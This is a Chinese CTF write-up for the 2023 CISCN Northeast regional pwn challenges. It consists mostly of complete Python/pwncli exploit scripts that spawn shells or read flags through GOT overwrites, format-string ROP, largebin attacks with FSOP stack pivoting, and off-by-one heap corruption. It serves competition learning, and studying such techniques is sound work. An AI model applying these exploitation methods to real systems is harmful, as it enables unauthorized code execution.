首页 > 其他分享 >CISCN东北赛区-2023-pwn-all

CISCN东北赛区-2023-pwn-all

时间:2023-07-05 23:22:42浏览次数:65  
标签:CISCN gift libc leak attack str 2023 pwn rdi

CISCN东北赛区-2023-pwn-all

Novice Challenge

漏洞利用

改strlen的got表

EXP

#!/usr/bin/env python3
from pwncli import *
cli_script()


io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

if gift.remote:
    libc = ELF("./libc.so.6")
    gift[libc] = libc

sla('challenge!','root')
sla('luck!','17')
lb = recv_current_libc_addr(0x3fc10f,0x10)
libc.address = lb
leak_ex2(lb)
off = str(0xffffffff+0x10)
sla('index>>\n',off)
sa('input>>',flat(
    {
        0:'/bin/sh;',
        0x1c:p32(0xffffff78)
    }
))
sa('bye',flat(
    libc.sym.system
)[:-4])

ia()


Quadra Two Times

漏洞利用

经典菜单,但是每个功能只能用两次,利用scanf函数让UB中的chunk进入Largebin即可。但是比赛的时候很蛋疼,本地打通了,远程没打通,我还以为是payload字节问题,搞了3个小时,换了4种写法...然后发现pwncli加载libc有点小问题,倒数8分钟极限出,拿到二血,但后果是导致比赛时没时间做剩下两题。。。

EXP

#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-07-01 09:10:39
Usage:
    Debug : python3 exp.py debug elf-file-path -t -b malloc
    Remote: python3 exp.py remote elf-file-path ip:port
'''

from pwncli import *
cli_script()


io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug



def cmd(i, prompt='our choice >> '):
    sla(prompt, str(i))

def add(sz):
    cmd('1')
    sla('size',str(sz))
    #......

def edit(i,cont):
    cmd('3')
    sla('>> ',str(i))
    sa('>>',cont)
    #......

def show(i):
    cmd('4')
    sla('>> ',str(i))
    #......

def dele(i):
    cmd('2')
    sla('>> ',str(i))
    #......
add(0x420)
add(0x418)
dele(0)
cmd('1'*0x450)
dele(1)
show(0)
lb = recv_current_libc_addr(2018184+0x448,0x100)
leak_ex2(lb)
libc.address = lb
edit(0,flat(
    {
        0:[
            lb + 0x1ecfd0,lb + 0x1ecfd0,0,
            libc.sym._IO_2_1_stderr_ + 0x68 - 0x20
        ]
    }
))
cmd('1'*0x450)
show(0)
ru('Content: ')
leak_heap = u64_ex(r(6)+b'\x00'*2)
leak_ex2(leak_heap)
CG.set_find_area(0,1)
rop_pd = flat(
    {
        0x0:[
            CG.mprotect_chain(leak_heap&(~0xfff)),
            CG.ret(),
            leak_heap + 0x1a0
        ]
    }
)
mgg1 = libc.search(asm("mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20]")).__next__()
mgg2 = libc.search(asm("mov rsp, rdx; ret")).__next__()
mgg3 = libc.search(asm("add rsp, 0x30; mov rax, r12; pop r12; ret")).__next__()

fp = IO_FILE_plus_struct()

fsop = fp.house_of_Lys_getshell_when_exit_under_2_37(0xdeadbeef,libc.sym._IO_wfile_jumps+0x300,leak_heap)[0x10:]
data = payload_replace(fsop,{
        0x38-0x10:mgg1,
        0xa0-0x10:0xdeadbeef,
        0x48-0x10:leak_heap + 0x100
    }
)
edit(1,flat(
    {
        0:[
            fp.house_of_Lys_stack_pivoting_when_exit_between_2_30_and_2_36(leak_heap,libc.sym._IO_wfile_jumps+0x300,rop_pd,mgg1,mgg2,mgg3)[0x10:]
        ],
        0x190:asm(shellcraft.cat('/flag'))

    }
))
cmd('5')
leak_ex2(mgg1)

ia()


'''
mov rbp, qword ptr [rdi + 0x48]; 
mov rax, qword ptr [rbp + 0x18]; 
lea r13, [rbp + 0x10]; 
mov dword ptr [rbp + 0x10], 0; 
mov rdi, r13; 
call qword ptr [rax + 0x28];'''

'''
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x04 0xc000003e  if (A != ARCH_X86_64) goto 0006
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0005
 0004: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0005: 0x25 0x00 0x01 0x00000110  if (A <= 0x110) goto 0007
 0006: 0x06 0x00 0x00 0x00000000  return KILL
 0007: 0x15 0x00 0x01 0x00000101  if (A != openat) goto 0009
 0008: 0x06 0x00 0x00 0x00000000  return KILL
 0009: 0x15 0x00 0x05 0x00000000  if (A != read) goto 0015
 0010: 0x20 0x00 0x00 0x00000014  A = fd >> 32 # read(fd, buf, count)
 0011: 0x15 0x00 0x04 0x00000000  if (A != 0x0) goto 0016
 0012: 0x20 0x00 0x00 0x00000010  A = fd # read(fd, buf, count)
 0013: 0x15 0x00 0x02 0x00000000  if (A != 0x0) goto 0016
 0014: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0015: 0x15 0x00 0x01 0x0000003b  if (A != execve) goto 0017
 0016: 0x06 0x00 0x00 0x00000000  return KILL
 0017: 0x06 0x00 0x00 0x7fff0000  return ALLOW

allow:exit_group
ban:openat
'''

repeater

漏洞利用

格式化字符串改链在栈上写rop链后,利用ret2csu的部分gadget劫持printf函数结束时的程序流到rop链

EXP

	#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-07-01 09:17:17
Usage:
    Debug : python3 exp.py debug elf-file-path -t -b malloc
    Remote: python3 exp.py remote elf-file-path ip:port
'''

from pwncli import *
cli_script()


io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

if gift.remote:
    libc = ELF("./libc-2.31.so")
    gift[libc] = libc

sa('length:',str(0x400))
pd = flat(
    {
        0:'%11$p-%13$p'
    }
)

sa('the content: ',pd)
lb = int(ru('-')[:-1],16) - 0x24083
libc.address = lb
stack = int(ru('P')[:-1],16) 
attack_stack = stack -0xe8
ogg = 0xe3b01 + lb
leak_ex2(lb)
leak_ex2(attack_stack)
attack_libc = lb + 0x1ec040

val_i_addr = stack - 0x30 -0xe8
leak_ex2(attack_stack)

def fmt_attack(va,attack_stack):
  sa('length',str(0x400))
  pd = flat(
    {
        0:['%' + str(attack_stack&0xffff) + 'c' + '%28$hn\x00']
    }
)
  sa('the content: ',pd)
  sa('length:',str(0x400))
  pd = flat(
    {
        0:['%' + str(va&0xff) + 'c' + '%41$hhn\x00']
    }
)
  sa('the content: ',pd)
  sa('length:',str(0x400))
  pd = flat(
    {
        0:['%' + str(val_i_addr&0xffff) + 'c' + '%28$hn\x00']
    }
)
  sa('the content: ',pd)
  sa('length:',str(0x400))
  pd = flat(
    {
        0:['%41$hhn\x00']
    }
)
  sa('the content: ',pd)
  
sys_addr = libc.sym.system
CG.set_find_area(0,1)
sh = CG.bin_sh()
pop_rdi = CG.pop_rdi_ret()
at_addr =attack_stack
leak_ex2(pop_rdi)

for i in range(6):
   fmt_attack(pop_rdi,attack_stack)
   pop_rdi = pop_rdi>>8
   attack_stack = attack_stack + 1
attack_stack = at_addr + 0x8
S()
for i in range(6):
   fmt_attack(sh,attack_stack)
   sh = sh>>8
   attack_stack = attack_stack + 1
attack_stack = at_addr + 0x10
for i in range(6):
   fmt_attack(sys_addr,attack_stack)
   sys_addr = sys_addr>>8
   attack_stack = attack_stack + 1

attack_ret = stack - 0x38 - 0xe8
leak_ex2(attack_ret)

sa('length:',str(0x400))
pd = flat(
  {
      0:['%' + str(attack_ret&0xff) + 'c' + '%28$hhn\x00']
  }
)

sa('the content: ',pd)
sa('length:',str(0x400))
pd = flat(
  {
      0:['%' + str(0xea) + 'c' + '%41$hhn\x00']
  }
)
sa('the content: ',pd)

ia()
'''
.text:00000000000013E6 48 83 C4 08                   add     rsp, 8
.text:00000000000013EA 5B                            pop     rbx
.text:00000000000013EB 5D                            pop     rbp
.text:00000000000013EC 41 5C                         pop     r12
.text:00000000000013EE 41 5D                         pop     r13
.text:00000000000013F0 41 5E                         pop     r14
.text:00000000000013F2 41 5F                         pop     r15
.text:00000000000013F4 C3                            retn
'''
'''
00:0000│ rsp 0x7ffec24b4808 —▸ 0x560ef5357369 ◂— jmp    0x560ef535736f
01:0008│     0x7ffec24b4810 ◂— 0x40000000000
02:0010│     0x7ffec24b4818 —▸ 0x560ef6a072a0 ◂— '%11$p-%13$p'
03:0018│     0x7ffec24b4820 ◂— 0x34323031 /* '1024' */
04:0020│     0x7ffec24b4828 ◂— 0xebcc69e4c0ca1a00
05:0028│ rbp 0x7ffec24b4830 ◂— 0x0
06:0030│     0x7ffec24b4838 —▸ 0x7f84688f9083 (__libc_start_main+243) ◂— mov    edi, eax
07:0038│     0x7ffec24b4840 ◂— 0x100000060 /* '`' */
08:0040│     0x7ffec24b4848 —▸ 0x7ffec24b4928 —▸ 0x7ffec24b50e8 ◂— 0x61682f656d6f682f ('/home/ha')
09:0048│     0x7ffec24b4850 ◂— 0x168abd7a0
0a:0050│     0x7ffec24b4858 —▸ 0x560ef535727f ◂— endbr64 
0b:0058│     0x7ffec24b4860 —▸ 0x560ef5357390 ◂— endbr64 
0c:0060│     0x7ffec24b4868 ◂— 0xb4bb42b1882ac453
0d:0068│     0x7ffec24b4870 —▸ 0x560ef5357140 ◂— endbr64 
0e:0070│     0x7ffec24b4878 —▸ 0x7ffec24b4920 ◂— 0x1
0f:0078│     0x7ffec24b4880 ◂— 0x0
10:0080│     0x7ffec24b4888 ◂— 0x0
11:0088│     0x7ffec24b4890 ◂— 0x4b46c62718aac453
12:0090│     0x7ffec24b4898 ◂— 0x4bb393aea844c453

'''

your_note

漏洞利用

off by one改打size然后leak libc,后面都是正常操作

EXP

#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-07-01 10:29:05
Usage:
    Debug : python3 exp.py debug elf-file-path -t -b malloc
    Remote: python3 exp.py remote elf-file-path ip:port
'''

from pwncli import *
cli_script()


io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

if gift.remote:
    libc = ELF("./libc-2.23.so")
    gift[libc] = libc


def cmd(i, prompt='5.go out for happy\n'):
    sla(prompt, str(i))

def add(i,sz,cont='/bin/sh\x00'):
    cmd('1')
    sla('index?',str(i))
    sla('size?',str(sz))
    sla('content?',cont)
    #......

def edit(i,cont):
    cmd('4')
    sla('hich index to edit?\n',str(i)) 
    sla('what do you want to rewrite it ?',cont)
    #......

def show(i):
    cmd('3')
    sla('index?',str(i)) 
    #......

def dele(i):
    cmd('2')
    sla('which one?',str(i))   
    #......

add(0,0xf8)
add(1,0x3f8)
add(2,0xf0-0x10)    #0x400 + 0xf0
add(3,0xf8)
add(4,0x3f8)
add(5,0x10)
add(6,0x10)
edit(0,flat(
    {
        0xf8:p8(0xf1)
    }
))
dele(1)

edit(3,flat(
    {
        0xf0:[
            0x100+0x4f0,
            p8(0x20)
        ]
    }
))
#unlink
dele(4)
add(1,0x3f8)
dele(6)
add(4,0x100,'a'*8)
add(6,0x100)
#leak a libc
show(4)
#use "^0xca"
ru('171^-^171^-^171^-^171^-^171^-^171^-^171^-^171^-^')

leak_libc = b''
for i in range(6):
    data_ = int(ru('^-^')[:-3])
    leak_ex2(data_)
    data_ = (data_^0xca)&0xff
    leak_ex2(data_)
    leak_libc += p8(data_)
leak_libc = u64_ex(leak_libc)
leak_ex2(leak_libc)
lb = leak_libc - 0x3ec10a
libc.address = lb
leak_ex2(lb)
#hijack tcachebin fd
dele(6)
dele(4)
show(2)
#0x22
leak_heap = b''
for i in range(6):
    data_ = int(ru('^-^')[:-3])
    leak_ex2(data_)
    data_ = (data_^0x22)&0xff
    leak_ex2(data_)
    leak_heap += p8(data_)
leak_heap = u64_ex(leak_heap)
attack_heap = leak_heap - 0x620 + 0x10
edit(2,flat(
    {
        0:[
            libc.sym.__free_hook
        ]
    }
))

#getshell
add(6,0x100)
add(4,0x100,p64_ex(0xfbad2887))
fp = IO_FILE_plus_struct()
CG.set_find_area(0,1)

rop_chain = flat(
    {
        0:[
            CG.mprotect_chain(attack_heap&~(0xfff)),
            CG.ret(),
            attack_heap+0xc0,
        ]
    }
)

edit(4,flat({
    0x0:[
        libc.sym.setcontext + 53
    ],
},filler = '\x00'
))
leak_ex2(leak_heap)
edit(0,flat({
    0xa0:[
        attack_heap + 0x20,
        CG.ret(),
    ],
    0x20:rop_chain,
    0xc0:ShellcodeMall.amd64.cat_flag,
},filler = '\x00'
))
S()
dele(0)



ia()

'''
  0x7f994b326085 <setcontext+53>:	mov    rsp,QWORD PTR [rdi+0xa0]
   0x7f994b32608c <setcontext+60>:	mov    rbx,QWORD PTR [rdi+0x80]
   0x7f994b326093 <setcontext+67>:	mov    rbp,QWORD PTR [rdi+0x78]
   0x7f994b326097 <setcontext+71>:	mov    r12,QWORD PTR [rdi+0x48]
   0x7f994b32609b <setcontext+75>:	mov    r13,QWORD PTR [rdi+0x50]
   0x7f994b32609f <setcontext+79>:	mov    r14,QWORD PTR [rdi+0x58]
   0x7f994b3260a3 <setcontext+83>:	mov    r15,QWORD PTR [rdi+0x60]
   0x7f994b3260a7 <setcontext+87>:	mov    rcx,QWORD PTR [rdi+0xa8]
   0x7f994b3260ae <setcontext+94>:	push   rcx
   0x7f994b3260af <setcontext+95>:	mov    rsi,QWORD PTR [rdi+0x70]
pwndbg> 
   0x7f994b3260b3 <setcontext+99>:	mov    rdx,QWORD PTR [rdi+0x88]
   0x7f994b3260ba <setcontext+106>:	mov    rcx,QWORD PTR [rdi+0x98]
   0x7f994b3260c1 <setcontext+113>:	mov    r8,QWORD PTR [rdi+0x28]
   0x7f994b3260c5 <setcontext+117>:	mov    r9,QWORD PTR [rdi+0x30]
   0x7f994b3260c9 <setcontext+121>:	mov    rdi,QWORD PTR [rdi+0x68]
   0x7f994b3260cd <setcontext+125>:	xor    eax,eax
   0x7f994b3260cf <setcontext+127>:	ret    

'''

标签:CISCN,gift,libc,leak,attack,str,2023,pwn,rdi
From: https://www.cnblogs.com/7resp4ss/p/17530599.html

相关文章

  • 2023年7月5日,生产者消费者模型,线程的休眠、礼让、合并、中断、生命周期、守护线程
    线程复习1.线程的休眠需求:编写一个抽取学员回答问题的程序,要求倒数三秒后输出被抽中的学员姓名分析:1.创建String数组存放学员姓名2.利用随机数获取学员下标3.通过下标获取学员姓名4.倒计时3秒通过for循环使用Thread.sleep(1000)来实现,Thread.sleep(1000);此方法为静态......
  • 2023-07-05:爱丽丝和鲍勃继续他们的石子游戏 许多堆石子 排成一行,每堆都有正整数颗石
    2023-07-05:爱丽丝和鲍勃继续他们的石子游戏许多堆石子排成一行,每堆都有正整数颗石子piles[i]游戏以谁手中的石子最多来决出胜负。爱丽丝和鲍勃轮流进行,爱丽丝先开始。最初,M=1。在每个玩家的回合中,该玩家可以拿走剩下的前X堆的所有石子,其中1<=X<=2M然后,令M=max......
  • day82(2023.7.5)
    1.什么是框架? ......
  • 每日总结2023年7月5日
    今日学习:页式存储(逻辑地址:页号+页内地址):逻辑地址和物理地址间的转换。优点:利用率高,便于管理。缺点:增加系统开销,可能产生抖动现象。段式存储(逻辑地址:段号+段内地址):优点:便于共享。缺点:内存利用率低。段页式存储:优点:空间浪费小,共享容易。缺点:增加软件复杂度,增加开销。块表:一块小容量......
  • 2023/7HL集训游记
    写在前面因为本人补题速度特别慢,所以博客随缘更新,其中还包括部分学术内容,纯享版指路Steven24博客。Day014时入眠,23时起床,一宿没睡,一直在开摆,顺便结束了斗破漫画的三刷,后来证明这是一个正确的选择,因为之后的几天都是断网状态。Day1上了飞机,还是很快就落地了,又是熟悉的夏天......
  • 2023.7.5
    快乐的一天从牛肉面开始,早上吃完东西后就去乡下的老家了,和舅舅约定好去钓鱼的,他还在忙着装修老房子呢,我就刷了一会儿手机,等到中午吃完饭才忙完,我带了我爸的渔具,舅舅可是个钓鱼行家,装备十分精良,钓了一下午,我只起了一条一斤的鲤鱼,他才厉害,钓了一条大的好像是2斤半的鲫鱼,总共加起来的......
  • 2023.7.5
    1//2023.7.5周三2publicstaticvoidmain(String[]args)3{4//字符串连接符+5inta=10;6intb=20;7System.out.println(""+a+b);//输出:10208System.out.println(a+b+"");//输出:30910}11//java......
  • 2023-7-5 #64 短暂回归撕开色盘 拼凑回忆填补空白
    ——泠笙《多重妄想》442P7729交通运输(WormholeTransportaion)挺不错的题目。第一问较为简单,建图后,容易发现答案是\(m-2\)加最小环长度\(L\)。第二问先考虑环的部分分,问题即为:计数带标号无根树的数量,使得\(\sum\operatorname{dis}(i,i\bmodn+1)=2n-2\)。提\(n\)为根,......
  • 2023.7.5
    过了零点应该就算是今天了吧,所以说是在今天睡前了解到了p2p这个东西,听的一知半解但是很高兴能了解到它。今天准备学习,但是不多,似乎又被睡觉占领了大部分时间。上午又重新下了一个编译器,据说那个很好用。之后开始看《大道至简》,准备写读后感。但是中午清醒的大脑又被困倦占领,于......
  • 2023.7.5 杂题
    CF1174FEhabandtheBigFinale树链剖分。先s1求出\(x\)所在子树\(y\)。若\(y\)为\(1\)轻儿子,递归求解\(y\)。若\(y\)为重儿子,那么找到重链上与\(x\)深度相同的节点\(c\).调用dc,此时\(c\)向上跳\(x\)与\(c\)距离的一半便是\(lca\),递归求解。相当......